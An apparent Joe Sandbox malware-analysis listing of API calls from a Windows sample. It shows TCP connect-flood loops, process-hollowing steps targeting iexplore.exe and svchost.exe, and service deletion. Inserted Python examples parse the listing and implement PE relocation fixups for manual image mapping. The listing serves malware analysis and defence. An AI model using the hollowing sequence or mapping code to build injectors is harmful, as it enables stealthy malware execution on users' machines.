        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403D25
      • connect.WS2_32(00000000,?,00000010), ref: 00403D31
      • Sleep.KERNEL32(000001F4), ref: 00403D38
      • closesocket.WS2_32(00000000), ref: 00403D3B
      • Sleep.KERNEL32(?), ref: 00403D47
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction ID: c9b9b10d26a8ac24fc8dc46de84298ce88c3985539e8605e2d809d9f5261d823
      • Opcode Fuzzy Hash: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction Fuzzy Hash: 6511A0716003016BD700EF69DD41B57B7E8EF88710F00883AF545E7262E6B5D9508B6A
      APIs
      • htons.WS2_32 ref: 00403D9B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403DDB
      • connect.WS2_32(00000000,?,00000010), ref: 00403DE7
      • Sleep.KERNEL32(00000014), ref: 00403DEB
      • Sleep.KERNEL32(00000064), ref: 00403E06
      • closesocket.WS2_32(?), ref: 00403E1C
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction ID: db46a9e34c16731a9cca81507a1d94d98400597ef13b238ba8d557dd9881dec4
      • Opcode Fuzzy Hash: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction Fuzzy Hash: 26115B716043419BDB00DF25DD41A5BBBE8AF88704F01092EF585AB291E7B4EA148F9A
      APIs
      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00401B79
      • GetFileSize.KERNEL32(00000000,00000000), ref: 00401B88
      • ??2@YAPAXI@Z.MSVCRT(?,?,00000000), ref: 00401BA2
      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401BB8
      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00401BBF
      • CloseHandle.KERNEL32(00000000), ref: 00401BCC
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: File$CloseHandle$??2@CreateReadSize
      • String ID:
      • API String ID: 2748938236-0
      • Opcode ID: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction ID: a0a192e2a767c00397ca819df4e1f58d6aa4c41ca3a1c50c818334c52765ceb6
      • Opcode Fuzzy Hash: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction Fuzzy Hash: 7F018171241210BFE320DF249E49F5B36E8EB85B11F110429F705F62C0D774A81586BA
      APIs
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402109
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402116
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402132
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040213F
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040215B
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402168
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: ServiceStatus
      • String ID:
      • API String ID: 3969395364-0
      • Opcode ID: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction ID: 79b47afaa4391bb2004c4c7ac8aae8e92e9b7ad006814b7af97adc9c59869305
      • Opcode Fuzzy Hash: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction Fuzzy Hash: 86F0FFB2A40159B6CA00EB98BE54F4276B8B7987207118033B204B32E2C5F8BC00CF6C
      APIs
      • CreateProcessA.KERNEL32 ref: 00404F95
      • GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
      • VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Process$ContextCreateMemoryQueryReadThreadVirtual
      • String ID: D
      • API String ID: 2027120601-2746444292
      • Opcode ID: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction ID: ff5d6133ced2bfcf86262151f3cbec8a07388085264d046bedd301de37389764
      • Opcode Fuzzy Hash: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction Fuzzy Hash: D531F2B5604345AFE314CF58C844E6BB7E8FB89301F10892EFA8997251D770A8058BA2
      APIs
      • LoadLibraryA.KERNEL32(ntdll.dll,?,?,004050FA,?,?,00000000,00000000,00000000), ref: 00404F09
      • GetProcAddress.KERNEL32(00000000,ZwUnmapViewOfSection), ref: 00404F1B
      • FreeLibrary.KERNEL32(00000000), ref: 00404F39
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: ZwUnmapViewOfSection$ntdll.dll
      • API String ID: 145871493-452462277
      • Opcode ID: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction ID: efc8a783f345efe3de7d969348ce7e2f5f5aa606f921517c0f9cd98c218141f8
      • Opcode Fuzzy Hash: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction Fuzzy Hash: 11E0927620022157C220A7249D08E2B66A59BC1F513024139F942F3280CA38880682A9
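The function records above are easier to triage once the hex argument columns are decoded and each function is tagged with the behaviour its API set implements: the socket(2,2,0x11)/sendto/Sleep loops are UDP senders, the socket(2,1,6)/connect/closesocket loops are TCP connect-and-drop loops, CreateProcessA followed by GetThreadContext/ReadProcessMemory and a separate lookup of ZwUnmapViewOfSection is the classic first stage of process hollowing, and OpenSCManagerA/OpenServiceA/DeleteService removes a service. The Python helper below is an added example, not Joe Sandbox code and not part of this report. It parses text in the layout used in this section; its sample input is a handful of API lines copied from the records above; the socket, Winsock and Service Control Manager constants it decodes are standard Windows SDK values; and the behaviour labels are this example's own naming, not a Joe Sandbox signature.

```python
import re

# One bullet of an "APIs" listing: "api.DLL(args), ref: ADDR"; subcall lines carry a prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Standard Windows SDK values for the hex argument columns that matter for triage.
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOL = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOCKOPT = {(0xFFFF, 0x1005): "SOL_SOCKET/SO_SNDTIMEO", (0xFFFF, 0x1006): "SOL_SOCKET/SO_RCVTIMEO"}
ACCESS = {0xF003F: "SC_MANAGER_ALL_ACCESS", 0xF01FF: "SERVICE_ALL_ACCESS"}

# Constructed sample input: API lines copied from the records in this section.
SAMPLE = """\
APIs
• WSAStartup.WS2_32(00000202,?), ref: 00403453
• setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 004034A0
Memory Dump Source
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 00403634
• sendto.WS2_32(00000000,?,00000000,00000000,?,00000010), ref: 004036A1
• Sleep.KERNEL32(?), ref: 004036BC
Memory Dump Source
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00403D25
• connect.WS2_32(00000000,?,00000010), ref: 00403D31
• Sleep.KERNEL32(000001F4), ref: 00403D38
• closesocket.WS2_32(00000000), ref: 00403D3B
Memory Dump Source
APIs
• CreateProcessA.KERNEL32 ref: 00404F95
• GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
• ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
Memory Dump Source
APIs
• LoadLibraryA.KERNEL32(ntdll.dll,?,?,004050FA,?,?,00000000,00000000,00000000), ref: 00404F09
• GetProcAddress.KERNEL32(00000000,ZwUnmapViewOfSection), ref: 00404F1B
Memory Dump Source
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004022CA
• OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004022E3
• DeleteService.ADVAPI32(00000000), ref: 004022F6
Memory Dump Source
"""


def as_int(tok):  # hex column -> int; '?' (unknown to the plugin) or a string -> None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None


def parse_records(text):
    """Group the bullets under each 'APIs' header into one function record."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = []
            records.append(cur)
        elif s.startswith("Memory Dump Source"):
            cur = None
        elif cur is not None and (m := API_LINE.match(line)):
            raw = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.append({"api": m["api"], "raw": raw, "args": [as_int(a) for a in raw], "ref": m["ref"]})
    return records


def decode(call):  # render the constants a reader would otherwise look up by hand
    api, a = call["api"], call["args"]
    if api == "socket" and len(a) == 3 and None not in a:
        return "socket(%s, %s, %s)" % ("AF_INET" if a[0] == 2 else a[0],
                                        SOCKET_TYPE.get(a[1], a[1]), PROTOCOL.get(a[2], a[2]))
    if api == "setsockopt" and len(a) >= 3 and (a[1], a[2]) in SOCKOPT:
        return "setsockopt(%s)" % SOCKOPT[(a[1], a[2])]
    if api == "WSAStartup" and a and a[0] is not None:
        return "WSAStartup(version %d.%d)" % (a[0] & 0xFF, a[0] >> 8)
    if api in ("OpenSCManagerA", "OpenServiceA") and a and a[-1] in ACCESS:
        return "%s(%s)" % (api, ACCESS[a[-1]])
    if api == "Sleep" and a and a[0] is not None:
        return "Sleep(%d ms)" % a[0]


def classify(record):  # tag one function with the behaviours its API set implements
    apis = {c["api"] for c in record}
    sock = next((c["args"] for c in record if c["api"] == "socket" and len(c["args"]) == 3), None)
    labels = []
    if sock and sock[1:] == [2, 17] and apis & {"send", "sendto"} and "Sleep" in apis:
        labels.append("udp-flood-loop")            # SOCK_DGRAM/UDP send paced by Sleep
    if sock and sock[1:] == [1, 6] and {"connect", "closesocket"} <= apis:
        labels.append("tcp-connect-flood-loop")    # SOCK_STREAM/TCP connect-then-close
    if {"CreateProcessA", "GetThreadContext", "ReadProcessMemory"} <= apis:
        labels.append("suspended-process-inspection")   # first stage of process hollowing
    if {"OpenSCManagerA", "OpenServiceA", "DeleteService"} <= apis:
        labels.append("service-removal")
    for c in record:                               # name each dynamically resolved import
        if c["api"] == "GetProcAddress" and len(c["raw"]) == 2:
            labels.append("dynamic-api-resolution:" + c["raw"][1])
    return labels


def triage(text):  # per function: entry address, behaviour labels, decoded constants
    return [{"entry": rec[0]["ref"], "labels": classify(rec), "decoded": [d for d in map(decode, rec) if d]}
            for rec in parse_records(text) if rec]
```

Run `triage(SAMPLE)` to get one entry per record; the decoded column shows, for instance, that the setsockopt at 004034A0 sets SO_SNDTIMEO and that the OpenSCManagerA/OpenServiceA pair asks for full access before DeleteService. Labels are deliberately conservative: a function only gets "udp-flood-loop" when the socket type and protocol columns, a send call and a Sleep pacing call are all present in the same record.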
      APIs
      • LoadLibraryA.KERNEL32(dnsapi.dll), ref: 00401006
      • GetProcAddress.KERNEL32(00000000,DnsFlushResolverCache), ref: 00401018
      • FreeLibrary.KERNEL32(00000000), ref: 00401025
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: DnsFlushResolverCache$dnsapi.dll
      • API String ID: 145871493-2397261594
      • Opcode ID: d501a4e58af21f11d6eed54cc70368c9c95fc04e874483feec0f3d3114b002d3
      • Instruction ID: 6eb7416c84d66eeeb6002940983d616efea6aab674776c4e38c4d1c4f80a77ff
      • Opcode Fuzzy Hash: d501a4e58af21f11d6eed54cc70368c9c95fc04e874483feec0f3d3114b002d3
      • Instruction Fuzzy Hash: 12D0A9319829219BC2313B202D08BDF2A949E46B403020132F802F12E0CB3C889180AE
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004022CA
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004022E3
      • DeleteService.ADVAPI32(00000000), ref: 004022F6
      • CloseServiceHandle.ADVAPI32(00000000), ref: 004022FD
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00402300
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$DeleteManager
      • String ID:
      • API String ID: 204194956-0
      • Opcode ID: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction ID: 9b0c48f28204a619d0ffdb4144fcbd549302fdad28ef3037a9a57e52c33c53b6
      • Opcode Fuzzy Hash: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction Fuzzy Hash: 91E0D8362826227BE2129328AD88F7F762CEF85B91F010125FB0576288CE748C019679
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: printf
      • String ID: relo type %d found at .%X$No fixups!
      • API String ID: 3524737521-288157267
      • Opcode ID: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction ID: 782b23fc7fe4eadffc9be543d9f3ff17d391247f2d2b8b0a52209ba6c093ed9f
      • Opcode Fuzzy Hash: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction Fuzzy Hash: DF31F436A042058FD724EF18C980A6773E5EFC0304F148A7EE88697791D738EA49C799
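The function above is tagged only by its printf strings "relo type %d found at .%X" and "No fixups!", which is what a manual PE mapper prints while walking an image's base-relocation directory before handing control to a hollowed process; the report does not show the function's body. As an added illustration (not code from the sample and not Joe Sandbox code), the following Python applies IMAGE_REL_BASED_HIGHLOW fixups to a 32-bit image being mapped at a base other than its preferred one, skips the ABSOLUTE padding entries, reports any relocation type it does not handle (the "relo type %d found at .%X" case) and returns early when the directory is empty (the "No fixups!" case). The image, its single relocation block and the preferred base 0x00400000 are constructed inline for the demonstration; the block and entry layout follow the documented IMAGE_BASE_RELOCATION format.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, no fixup
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address: add the whole delta
PREFERRED_BASE = 0x00400000    # assumed ImageBase of the constructed image below


def read_u32(image, rva):
    return struct.unpack_from("<I", image, rva)[0]


def apply_relocations(image, reloc_rva, reloc_size, delta):
    """Walk the IMAGE_BASE_RELOCATION blocks of a section-mapped image (a bytearray
    indexed by RVA) and add `delta` to every HIGHLOW target.  Returns
    (fixups_applied, unhandled), where unhandled lists (type, rva) pairs, i.e. the
    cases the sample reports as 'relo type %d found at .%X'."""
    if reloc_size == 0:
        return 0, []                              # the 'No fixups!' path
    applied, unhandled = 0, []
    pos, end = reloc_rva, reloc_rva + reloc_size
    while pos + 8 <= end:
        page_rva, block_size = struct.unpack_from("<II", image, pos)
        if block_size < 8:                        # malformed block: stop instead of looping forever
            break
        for i in range((block_size - 8) // 2):   # each entry: 4-bit type, 12-bit page offset
            entry, = struct.unpack_from("<H", image, pos + 8 + 2 * i)
            rtype, target = entry >> 12, page_rva + (entry & 0xFFF)
            if rtype == IMAGE_REL_BASED_ABSOLUTE:
                continue
            if rtype == IMAGE_REL_BASED_HIGHLOW:
                struct.pack_into("<I", image, target, (read_u32(image, target) + delta) & 0xFFFFFFFF)
                applied += 1
            else:
                unhandled.append((rtype, target))
        pos += block_size
    return applied, unhandled


def build_sample_image():
    """Constructed 3-page image: two absolute pointers at RVA 0x1000 and 0x1010 that
    point into the image, plus one .reloc block at RVA 0x2000 describing them."""
    image = bytearray(0x3000)
    struct.pack_into("<I", image, 0x1000, PREFERRED_BASE + 0x1010)
    struct.pack_into("<I", image, 0x1010, PREFERRED_BASE + 0x2000)
    entries = [
        (IMAGE_REL_BASED_HIGHLOW << 12) | 0x000,
        (IMAGE_REL_BASED_HIGHLOW << 12) | 0x010,
        (10 << 12) | 0x020,                       # IMAGE_REL_BASED_DIR64: not valid in a 32-bit loader
        IMAGE_REL_BASED_ABSOLUTE,                 # padding so SizeOfBlock stays 4-byte aligned
    ]
    block_size = 8 + 2 * len(entries)
    struct.pack_into("<II", image, 0x2000, 0x1000, block_size)
    struct.pack_into("<%dH" % len(entries), image, 0x2008, *entries)
    return image, 0x2000, block_size


def relocate_sample(new_base):
    """Map the constructed image as if at `new_base`; returns (image, applied, unhandled)."""
    image, reloc_rva, reloc_size = build_sample_image()
    applied, unhandled = apply_relocations(image, reloc_rva, reloc_size, new_base - PREFERRED_BASE)
    return image, applied, unhandled


if __name__ == "__main__":
    img, n, bad = relocate_sample(0x10000000)
    print("fixups applied:", n)
    for rtype, rva in bad:
        print("relo type %d found at .%X" % (rtype, rva))
    print("pointer at RVA 0x1000 is now 0x%08X" % read_u32(img, 0x1000))
```

With the delta 0x10000000 - 0x00400000 the two pointers become 0x10001010 and 0x10002000, and the DIR64 entry is reported rather than silently applied, which is the behaviour a reader should expect from the "relo type %d" message: a loader that meets a relocation type it does not implement is leaving that address unpatched.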
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405627
      • lstrcat.KERNEL32 ref: 0040563C
      • lstrcpy.KERNEL32(?,?), ref: 00405661
      Strings
      • \Program Files\Internet Explorer\, xrefs: 00405631
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\
      • API String ID: 2630975639-1791216374
      • Opcode ID: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction ID: bfcf0f80d20a37eb35ee965870948888e4b0ca92358fc844c94cae622ae2a00a
      • Opcode Fuzzy Hash: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction Fuzzy Hash: E9F02BB12441106BD728D71CEC51BEB77D4AFC8700F44043DF6CAE3290D6798558C696
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004053E7
      • lstrcat.KERNEL32 ref: 004053FC
      • lstrcpy.KERNEL32(?,?), ref: 00405421
      Strings
      • \Program Files\Internet Explorer\iexplore.exe, xrefs: 004053F1
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\iexplore.exe
      • API String ID: 2630975639-1907246925
      • Opcode ID: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction ID: f78577937c66193e5ff90f452aee5a2bd68c8ab3a1555d09418fe11549a69a2a
      • Opcode Fuzzy Hash: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction Fuzzy Hash: 6EF050712441146BD728D71CEC51BDB77E4AFC8700F44043DFACAE3290D6B88558CB96
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405467
      • lstrcat.KERNEL32(?,\svchost.exe), ref: 00405477
      • lstrcpy.KERNEL32(?,?), ref: 0040549C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \svchost.exe
      • API String ID: 2630975639-2416354339
      • Opcode ID: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction ID: 4611d1f1260c59ae314430bfba731fbd35f7976e4dc38790d624a9758d3b1088
      • Opcode Fuzzy Hash: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction Fuzzy Hash: 8EF059716042106BD738D728EC91BEB77D8AF88700F400439BA8AE32A0D6799494CA86
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004054D7
